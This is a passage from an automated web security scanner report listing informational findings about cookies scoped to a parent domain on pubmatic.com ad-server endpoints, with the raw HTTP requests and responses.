Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26072=823-2:1098-2

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:12:49 GMT
Content-Length: 1910
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:12:49 GMT; path=/
Set-Cookie: _curtime=1317600769; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:22:49 GMT; path=/
Set-Cookie: camfreq_749312571=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:52:49 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:12:49 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...
13.125. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&kadNetwork=6&prevkadIds=21556_21556&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame32662026621&kltstamp=2011-9-2%2020%3A53%3A13&ranreq=0.44594317954033613&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:; pubfreq_26621_21557_1797109372=921-1; __qca=P0-585104895-1317606788364; pubfreq_26621_21556_427351122=207-1; PUBMDCID=1; pubfreq_26621_21556_1914588461=6-1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:09 GMT
Content-Length: 1392
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:09 GMT; path=/
Set-Cookie: pubfreq_26621_21556_126284783=921-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:09 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame32662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...
13.126. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A13%3A24&ranreq=0.780912266112864&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; pubfreq_26072=823-3:1098-3; PUBMDCID=1; _curtime=1317600804; camfreq_126550188=3663-1_1317687204; pubfreq_26072_21043_618709548=243-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1905
Date: Mon, 03 Oct 2011 00:14:52 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:14:52 GMT; path=/
Set-Cookie: _curtime=1317600892; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:24:52 GMT; path=/
Set-Cookie: camfreq_1175871307=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:54:52 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:14:52 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...
13.127. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1710
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: pubfreq_26072_21044_1115692444=823-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAAAAAAAAAAAAAAAAAAA
...[SNIP]...
13.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21043&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A13%3A21&ranreq=0.6788685892242938&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PMDTSHR=cat:; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; KTPCACOOKIE=YES; pubfreq_26072=823-3:1098-3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1903
Date: Mon, 03 Oct 2011 00:14:32 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:14:32 GMT; path=/
Set-Cookie: _curtime=1317600872; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:24:32 GMT; path=/
Set-Cookie: camfreq_1933189234=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:54:32 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:14:32 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAAzUgAATw4AAA8dAAAAAAAAA
...[SNIP]...
13.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21557&kadwidth=728&kadheight=90&kbgColor=FFFFFF&ktextColor=000000&klinkColor=008EB7&pageURL=http://www.igougo.com/about/&frameName=http_www_igougo_comaboutkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A52%3A57&ranreq=0.7452815969008952&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x47&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBMDCID=1; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:52:54 GMT
Content-Length: 1734
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:52:54 GMT; path=/
Set-Cookie: pubfreq_26621=; domain=pubmatic.com; expires=Wed, 05-Oct-2011 01:52:54 GMT; path=/
Set-Cookie: pubtime_26621=TMC; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:54 GMT; path=/
Set-Cookie: pubfreq_26621_21557_1687682837=559-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:32:54 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:54 GMT; path=/

document.write('<div id="http_www_igougo_comaboutkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=/GcAAP1nAAA1VAAAAAA
...[SNIP]...
13.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21043&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A1&ranreq=0.3272909566294402&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1903
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: _curtime=1317600551; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:19:11 GMT; path=/
Set-Cookie: camfreq_60531448=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: pubfreq_26072_21043_312218146=243-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAAzUgAATw4AAA8dAAAAAAAAA
...[SNIP]...
13.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A53%3A10&ranreq=0.35609531262889504&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:; PUBMDCID=1; pubfreq_26621_21557_1797109372=921-1; KTPCACOOKIE=YES; __qca=P0-585104895-1317606788364

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:07 GMT
Content-Length: 1550
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:07 GMT; path=/
Set-Cookie: pubfreq_26621_21556_427351122=207-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:07 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...
13.132. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
